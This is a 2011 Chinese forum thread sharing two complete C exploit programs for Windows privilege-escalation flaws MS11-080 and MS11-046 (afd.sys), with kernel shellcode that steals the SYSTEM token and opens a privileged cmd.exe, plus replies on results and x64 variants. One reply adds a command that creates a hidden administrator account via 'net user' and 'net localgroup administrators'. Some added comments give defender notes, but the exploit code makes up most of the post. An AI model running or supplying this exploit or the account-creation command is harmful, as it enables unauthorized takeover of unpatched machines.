[讨论]MS11-080、MS11-046两个提权代码

2011-12-1 20:09
拿着大牛写的代码自己弹CMD玩,多多包涵。。
/*
 * MS11-080 Afd.sys Privilege Escalation Exploit
 * 来源:Matteo Memelli,b8aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3g2^5M7r3I4G2K9i4c8K6i4K6u0r3x3e0R3I4y4K6k6Q4x3V1j5`.
 * 改编:KiDebug,Google@pku.edu.cn
 * 编译:VC6.0
 * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
 */
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib, "ws2_32.lib")

/*
 * One entry of the SystemModuleInformation (class 11) array that
 * NtQuerySystemInformation fills in.  main() reads only Modules[0] and
 * assumes it is the kernel image: ImageBase is taken as the kernel-mode
 * base and FullPathName + OffsetToFileName as the file name to load.
 * Field order and widths mirror the kernel's structure; changing or
 * padding them would shift every field the sample reads.
 */
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
	HANDLE Section;                 // Not filled in
	PVOID MappedBase;
	PVOID ImageBase;                // kernel-mode load address of the module
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;        // offset of the bare file name inside FullPathName
	UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

/*
 * Header of the SystemModuleInformation buffer.  main() passes a buffer of
 * exactly this size (room for one entry), expects the call to fail with
 * STATUS_INFO_LENGTH_MISMATCH, and still reads Modules[0] afterwards --
 * i.e. it relies on the first entry being written before the length check
 * fails.  Not verifiable from this file; see the NOTE in main().
 */
typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

/*
 * ntdll natives the sample calls without an import library.  The
 * function-pointer types below reflect the prototypes as this sample uses
 * them (undocumented API, so treat the parameter types as the author's
 * assumption).  The globals are filled from GetProcAddress in main(),
 * which returns early if any lookup fails.
 */
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_	NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;

/*
 * Kernel-mode addresses computed in main() (export RVA taken from a
 * user-mode mapping of ntoskrnl.exe, rebased onto the real kernel base)
 * and read by ShellCode() while it runs in kernel mode.
 * WriteToHalDispatchTable is the address main() hands to DeviceIoControl
 * as its output buffer; the other three are the kernel routines/variables
 * the payload dereferences.  All four are plain ULONGs, so this is 32-bit
 * only (see the x64 discussion in the replies).
 */
ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

/*
 * Kernel-mode payload.  main() copies its first 100 bytes into the fixed
 * user-mode window at 0x02080000; it is reached through the overwritten
 * HalDispatchTable entry rather than called directly.  `naked` suppresses
 * the compiler prologue/epilogue so the function is the raw asm block
 * only; it saves and restores all registers and flags and ends in `ret`.
 *
 * What the asm does (each step is visible in the instructions below):
 *  1. scans the bytes of PsReferencePrimaryToken until an 8Dh byte is
 *     found and reads the DWORD that follows it as an offset;
 *  2. loads the process pointed to by PsInitialSystemProcess;
 *  3. passes fs:[124h] (presumably the current thread; the sample does
 *     not say) to PsGetThreadProcess to obtain the calling process;
 *  4. copies one DWORD at that offset from the former process into the
 *     latter -- the copy the original comments describe as giving the
 *     spawned cmd.exe a SYSTEM token.
 *
 * Defender's note: step 1 byte-scans a real kernel routine and step 4
 * blindly trusts the offset it finds, so a kernel build that differs
 * from the XP SP3 / 2003 SP2 builds named in the file header can make the
 * scan overrun or corrupt the wrong field; the BSOD reports in the replies
 * are consistent with that.  The vendor update for MS11-080 removes the
 * afd.sys flaw this payload depends on.
 */
void _declspec(naked) ShellCode()
{
	/* Raw asm only -- the four ULONG globals it references are set by main()
	   before the bytes are copied out, so the immediates are already valid. */
	__asm
	{
		pushad
		pushfd
		mov esi,PsReferencePrimaryToken
FindTokenOffset:
		lodsb
		cmp al, 8Dh;
		jnz FindTokenOffset
		mov edi,[esi+1]
		mov esi,PsInitialSystemProcess
		mov esi,[esi]
		push fs:[124h]
		mov eax,PsGetThreadProcess
		call eax
		add esi, edi
		add edi, eax
		movsd
		popfd
		popad
		ret
	}
}



/*
 * Entry point of the MS11-080 sample described in the file header.
 * Sequence: resolve the ntdll natives, map a low page, locate the kernel
 * image and rebase four of its exports, stage the payload in a NOP-filled
 * window, send one IOCTL to a socket handle with a kernel address as the
 * "output buffer", then call NtQueryIntervalProfile to reach the
 * overwritten pointer and spawn cmd.exe.
 *
 * Defender's notes:
 *  - Everything here is tied to the exact kernel builds named in the
 *    header (XP SP3 / 2003 SP2); replies report a blue screen on other
 *    SP3 machines, which is the expected failure mode.  The MS11-080
 *    update removes the afd.sys flaw.
 *  - Observable behaviour worth alerting on: a user process loading
 *    ntoskrnl.exe with LoadLibrary, DeviceIoControl issued on a socket
 *    handle with a non-Winsock control code, and cmd.exe started by a
 *    low-privilege parent yet running as SYSTEM.
 *
 * NOTE(review): `void main` is non-standard; WSAStartup/socket/connect/
 * DeviceIoControl failures are printed but not acted on; `%d` is used for
 * the DWORD from GetLastError; the ntoskrnl module handle is never freed.
 * Left byte-identical here -- this is documentation only.
 */
void main( )
{
	// Resolve the natives by name; bail if any is missing.
	HMODULE	ntdll				=	GetModuleHandle( "ntdll.dll" );
	NtQueryIntervalProfile		=	(NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
	NtAllocateVirtualMemory		=	(NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
	NtQuerySystemInformation	=	( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
	if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
		return;

	// Commit a page starting at address 1 in the current process
	// ((HANDLE)0xFFFFFFFF is presumably the current-process pseudo-handle);
	// the memset/memcpy at 0x1000 further down write into this low region.
	// NOTE(review): whether 0x1000 falls inside the committed range depends
	// on how BaseAddress/RegionSize are rounded -- not checked by the code.
	ULONG    BaseAddress = 1 , RegionSize = 0x1000, status;
	status = NtAllocateVirtualMemory( (HANDLE)0xFFFFFFFF, (PVOID*)&BaseAddress, 0, &RegionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE );
	if ( status )
		return;

	// Fetch the kernel module entry; one call with a one-entry buffer is enough.
	// The call is expected to fail with STATUS_INFO_LENGTH_MISMATCH, and
	// Modules[0] is read anyway (assumed to be the kernel image).
	ULONG	NtoskrnlBase;
	RTL_PROCESS_MODULES	module;
	status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
	if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
		return;

	NtoskrnlBase   	=	(ULONG)module.Modules[0].ImageBase;

	// Map ntoskrnl.exe into this process purely to resolve export RVAs.
	HMODULE		ntoskrnl;
	ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
	if ( ntoskrnl == NULL )
		return;

	// Rebase each export: (user-mode address - user-mode base) + kernel base.
	WriteToHalDispatchTable		=	(ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; // address the IOCTL below is pointed at (+4+2 into the table)
	PsInitialSystemProcess		=	(ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsReferencePrimaryToken		=	(ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsGetThreadProcess			=	(ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	
	// From here on the samples differ from each other (original author's remark).
	// Stage the payload: a 0x20000-byte window filled with 0x90 (NOP) so that
	// control landing anywhere in it slides into the ShellCode copy at 0x02080000.
	if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
		return;

	memset((PVOID)0x02070000,0x90,0x20000);
	memcpy((PVOID)0x02080000,ShellCode,100);


	WSADATA ws;

	SOCKET tcp_socket;
	struct sockaddr_in peer;
	ULONG  dwReturnSize;

	// Winsock setup and a loopback connect on port 4455; the connect result
	// is only printed, the socket is used regardless.
	WSAStartup(0x0202,&ws);

	peer.sin_family = AF_INET;
	peer.sin_port = htons(4455);
	peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

	tcp_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
	{
		printf("connect error\n");
	}

	// Hand-built 25-byte input record, copied to 0x1000 inside a 0x108-byte
	// area pre-filled with 0x45; the IOCTL below points at 0x1004.
	UCHAR	buf1[26]= "\x41\x41\x41\x41\x42\x42\x42\x42\x00\x00\x00\x00\x44\x44\x44\x44\x01\x00\x00\x00\xe8\x00\x34\xf0\x00";
	memset((PVOID)0x1000,0x45,0x108);
	memcpy((PVOID)0x1000,buf1,25);
	
	// Control code 0x000120bb on the socket handle itself (so it reaches the
	// driver behind Winsock -- afd.sys per the header), with the rebased
	// kernel address as the output buffer and OutBufferSize 0.
	// A reply reports error=998 here on some machines.
	if(!DeviceIoControl((HANDLE)tcp_socket,0x000120bb, (PVOID)0x1004, 0x108, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
	{
		printf("error=%d\n", GetLastError());
	}

	// Trigger: per the original comment this call reaches the overwritten
	// pointer; cmd.exe is then started and ends up with the SYSTEM token.
	NtQueryIntervalProfile( 2, &status );
	ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
	return;
}


/*
 * 触发MS11-046
 * 来源:azy,0a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3S2A6i4K6u0W2j5X3q4A6k6s2g2Q4x3X3g2U0L8$3#2Q4x3V1k6S2P5Y4V1H3z5e0t1J5i4K6u0r3j5X3I4G2k6#2)9J5c8X3W2@1k6h3#2Q4x3V1j5H3y4e0x3H3y4U0g2V1x3e0V1%4j5$3g2T1k6X3y4S2y4e0M7J5j5K6R3@1z5e0u0Q4x3X3g2Z5N6r3#2D9
 * 改编:KiDebug,Google@pku.edu.cn
 * 编译:VC6.0
 * 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户
 */
#include <stdio.h>
#include <Winsock2.h>
#include <windows.h>
#pragma comment (lib, "ws2_32.lib")

/*
 * One entry of the SystemModuleInformation (class 11) array filled in by
 * NtQuerySystemInformation.  The second listing's main() reads only
 * Modules[0] and assumes it is the kernel image (ImageBase = kernel-mode
 * base; FullPathName + OffsetToFileName = file name to LoadLibrary).
 * Layout mirrors the kernel's structure; do not reorder or pad.
 * Duplicate of the definition in the first listing -- the two listings
 * are separate programs pasted into one post.
 */
typedef struct _RTL_PROCESS_MODULE_INFORMATION {
	HANDLE Section;                 // Not filled in
	PVOID MappedBase;
	PVOID ImageBase;                // kernel-mode load address of the module
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;        // offset of the bare file name inside FullPathName
	UCHAR  FullPathName[ 256 ];
} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;

/*
 * Header of the SystemModuleInformation buffer (one-entry variant).  The
 * second listing's main() passes exactly sizeof(RTL_PROCESS_MODULES),
 * expects STATUS_INFO_LENGTH_MISMATCH, and reads Modules[0] regardless.
 */
typedef struct _RTL_PROCESS_MODULES {
	ULONG NumberOfModules;
	RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ];
} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;

/*
 * ntdll natives resolved at runtime by the second listing's main().  The
 * prototypes are the author's assumptions about undocumented functions.
 * NOTE(review): NtAllocateVirtualMemory is resolved (and required to be
 * non-NULL) but never called in this listing; it appears to be carried
 * over from the MS11-080 sample above.
 */
typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG );
typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG );
typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG );
NtQueryIntervalProfile_	NtQueryIntervalProfile;
NtAllocateVirtualMemory_ NtAllocateVirtualMemory;
NtQuerySystemInformation_ NtQuerySystemInformation;

/*
 * Kernel-mode addresses computed in main() from a user-mode mapping of
 * ntoskrnl.exe and consumed by ShellCode() in kernel mode.
 * WriteToHalDispatchTable is the address the IOCTL is pointed at; the
 * other three are dereferenced by the payload.  32-bit ULONGs only.
 */
ULONG    PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable;

/*
 * Kernel-mode payload of the MS11-046 sample; byte-for-byte the same asm as
 * in the first listing.  main() copies its first 100 bytes to 0x02080000,
 * and control reaches it via the overwritten HalDispatchTable entry.
 * `naked` means no compiler prologue/epilogue: the block saves/restores all
 * registers and flags itself and returns with `ret`.
 *
 * The asm scans PsReferencePrimaryToken for an 8Dh byte to pick up an
 * offset, loads the process behind PsInitialSystemProcess, obtains the
 * calling process via PsGetThreadProcess(fs:[124h]) (fs:[124h] presumably
 * being the current thread -- the sample does not say), and copies one
 * DWORD at that offset from the former into the latter.
 *
 * Defender's note: the byte-scan and the blind copy assume the kernel
 * builds named in the file header; on other builds the scan can overrun or
 * the copy can hit the wrong field, which matches the "直接蓝屏" reports in
 * the replies.  The MS11-046 update removes the afd.sys flaw it relies on.
 */
void _declspec(naked) ShellCode()
{
	/* The four ULONG immediates below are filled by main() before the copy. */
	__asm
	{
		pushad
		pushfd
		mov esi,PsReferencePrimaryToken
FindTokenOffset:
		lodsb
		cmp al, 8Dh;
		jnz FindTokenOffset
		mov edi,[esi+1]
		mov esi,PsInitialSystemProcess
		mov esi,[esi]
		push fs:[124h]
		mov eax,PsGetThreadProcess
		call eax
		add esi, edi
		add edi, eax
		movsd
		popfd
		popad
		ret
	}
}



/*
 * Entry point of the MS11-046 sample (see the comment block above this
 * listing).  Same skeleton as the MS11-080 sample: resolve ntdll natives,
 * find and rebase kernel exports, stage the payload in a NOP window, send
 * one IOCTL on a socket handle with a kernel address as the output buffer,
 * then call NtQueryIntervalProfile and spawn cmd.exe.  Differences from
 * the first listing: no low-page allocation, port 0 / protocol 0 for the
 * socket, control code 0x12007 with a 0x60-byte DWORD array as input.
 *
 * Defender's notes:
 *  - Bound to the XP SP3 / 2003 SP2 builds named in the header; replies
 *    report both success and immediate BSOD on SP3.  The MS11-046 update
 *    removes the flaw.
 *  - Signals: LoadLibrary of ntoskrnl.exe by a user process, DeviceIoControl
 *    on a socket handle with a non-Winsock code, SYSTEM cmd.exe under a
 *    low-privilege parent.
 *
 * NOTE(review): `void main` is non-standard; WSAStartup/socket/connect/
 * DeviceIoControl results are printed but not acted on; `%d` for a DWORD;
 * `buf` is not initialised beyond buf[3]/buf[4], so the remaining bytes
 * of the 0x60 passed to the kernel are whatever was on the stack; the
 * ntoskrnl handle is never freed.  Documentation-only edit, code untouched.
 */
void main( )
{
	// Resolve the natives by name; bail if any is missing.
	HMODULE	ntdll				=	GetModuleHandle( "ntdll.dll" );
	NtQueryIntervalProfile		=	(NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" );
	NtAllocateVirtualMemory		=	(NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" );
	NtQuerySystemInformation	=	( NtQuerySystemInformation_ )GetProcAddress( ntdll ,"NtQuerySystemInformation" );
	if ( NtQueryIntervalProfile == NULL || NtAllocateVirtualMemory == NULL || NtQuerySystemInformation == NULL )
		return;
	
	// Fetch the kernel module entry; one call with a one-entry buffer is enough.
	// Expected to fail with STATUS_INFO_LENGTH_MISMATCH; Modules[0] is read anyway.
	ULONG	status, NtoskrnlBase;
	RTL_PROCESS_MODULES	module;
	status = NtQuerySystemInformation( 11, &module, sizeof(RTL_PROCESS_MODULES), NULL);//SystemModuleInformation 11
	if ( status != 0xC0000004 )    //STATUS_INFO_LENGTH_MISMATCH
		return;

	NtoskrnlBase   	=	(ULONG)module.Modules[0].ImageBase;

	// Map ntoskrnl.exe into this process purely to resolve export RVAs.
	HMODULE		ntoskrnl;
	ntoskrnl    =    LoadLibraryA( (LPCSTR)( module.Modules[0].FullPathName + module.Modules[0].OffsetToFileName ) );
	if ( ntoskrnl == NULL )
		return;

	// Rebase each export: (user-mode address - user-mode base) + kernel base.
	WriteToHalDispatchTable		=	(ULONG)GetProcAddress(ntoskrnl,"HalDispatchTable") - (ULONG)ntoskrnl + NtoskrnlBase + 4 + 2; // address the IOCTL below is pointed at (+4+2 into the table)
	PsInitialSystemProcess		=	(ULONG)GetProcAddress(ntoskrnl,"PsInitialSystemProcess") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsReferencePrimaryToken		=	(ULONG)GetProcAddress(ntoskrnl,"PsReferencePrimaryToken") - (ULONG)ntoskrnl + NtoskrnlBase;
	PsGetThreadProcess			=	(ULONG)GetProcAddress(ntoskrnl,"PsGetThreadProcess") - (ULONG)ntoskrnl + NtoskrnlBase;

	// From here on the samples differ from each other (original author's remark).
	// Stage the payload: 0x20000 bytes of 0x90 (NOP) with ShellCode at 0x02080000.
	if ( VirtualAlloc( (PVOID)0x02070000, 0x20000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) == NULL )
		return;
	
	memset((PVOID)0x02070000,0x90,0x20000);
	memcpy((PVOID)0x02080000,ShellCode,100);


	WSADATA ws;

	SOCKET tcp_socket;
	struct sockaddr_in peer;
	ULONG  dwReturnSize;

	// Winsock setup; the loopback connect to port 0 is expected to fail and
	// only prints -- the socket handle is what matters for the IOCTL below.
	WSAStartup(0x0202,&ws);

	peer.sin_family = AF_INET;
	peer.sin_port = htons(0);
	peer.sin_addr.s_addr = inet_addr( "127.0.0.1" );

	tcp_socket = socket(AF_INET, SOCK_STREAM, 0);

	if ( connect(tcp_socket, (struct sockaddr*) &peer, sizeof(struct sockaddr_in)) )
	{
		printf("connect error\n");
	}


	// Input record: only two DWORDs are set, the rest is uninitialised stack.
	DWORD buf[0x30];
	buf[3]=1;
	buf[4]=0x20;

	// Control code 0x12007 on the socket handle (driver behind Winsock,
	// afd.sys per the header), 0x60 input bytes, kernel address as output
	// buffer with OutBufferSize 0.
	if(!DeviceIoControl((HANDLE)tcp_socket,0x12007, (PVOID)buf, 0x60, (PVOID)WriteToHalDispatchTable, 0x0,&dwReturnSize, NULL))
	{
		printf("error=%d\n", GetLastError());
	}

	// Trigger: per the original comment this call reaches the overwritten
	// pointer; cmd.exe is then started and ends up with the SYSTEM token.
	NtQueryIntervalProfile( 2, &status );
	ShellExecute( NULL, "open", "cmd.exe", NULL, NULL, SW_SHOW);
	return;
}


最新回复 (18)
加多点注释该多好啊!
2011-12-1 20:27
这两个啥漏洞
2011-12-1 21:04
顶KiDebug
2011-12-1 21:23
都是提权啊

什么时候来个溢出的
2011-12-2 03:48
ms11-080在webshell下无法使用。
2011-12-2 08:30
kidebug 肿么能这么**
2011-12-2 08:54
哎  看来我和高手还差的很多很多啊
2011-12-2 09:31
/*
 * Reply snippet (not part of either listing above): a 32-bit struct view
 * of the IOCTL input record.  Presumably meant as a structured form of the
 * hand-built buf1 in the first listing; note the field order here does not
 * reproduce buf1 byte for byte, so treat it as the reply author's sketch.
 */
typedef struct _evil32
{
ULONG u1;
ULONG un0;
ULONG u2;
ULONG un1;
WORD  w1;
WORD  w2;
BYTE  z1;
}evil32;

/*
 * Reply snippet: 64-bit variant of evil32 -- the first field is widened
 * to two DWORDs (u1a/u1b) and, per the assignments below, the socket
 * handle is stored in u1b.  The reply author concludes that x64 did not
 * look exploitable with this; no 64-bit sample exists on this page.
 */
typedef struct _evil64
{
        ULONG u1a;
        ULONG u1b;
        ULONG un0;
        ULONG un1;
        WORD  w1;
        WORD  w2;
        BYTE  z1;
}evil64;

   /* Reply fragment: these assignments are not inside any function here and
      reference tcp_socket from the listing's main(), so they presumably
      belong after the socket is created.  Values mirror buf1's constants
      (0x41414141, 0x42424242, 1, 0xe8, 0x4444) in the reply author's order. */
   evil32 e32;
  evil64 e64;
  e32.u1=0x41414141;
  e32.u2=0x42424242;
  e32.un0=0;
  e32.un1=1;
  e32.w1=0xe8;
  e32.w2=0x4444;
  e32.z1=0;

  e64.u1a=0x41414141;
  e64.u1b=tcp_socket;
  e64.un0=0;
  e64.un1=1;
  e64.w1=0xe8;
  e64.w2=0x4444;
  e64.z1=0;

x64貌似不好利用。
2011-12-3 21:33
提权需要执行
2011-12-5 17:09
支持!!!!!!!!!!!!!!!!!!!!
2011-12-5 20:37
怎样用啊,我在VC6里编译运行弹出DOS窗口提示error=998,什么情况啊?
2011-12-8 09:38
ShellExecute( NULL, "open", "cmd.exe", "/c net user xxxx /add && net localgroup administrators xxxx /add", NULL, SW_SHOW);
这样改一下也好~
2011-12-9 17:55
尝试了下,第一个编译成功弹出cmd黑框,任务管理器里面显示system用户权限进程
2011-12-11 11:42
第一个在我计算机上崩溃蓝屏 XP SP3
2011-12-14 15:17
两个都成功了!!
2011-12-14 16:55
有支持64位的么?
2012-5-23 14:36
sp3 直接蓝屏
2012-5-25 13:08
很厉害,能够有分析说明就好了~~~菜鸟飘过
2012-8-30 11:13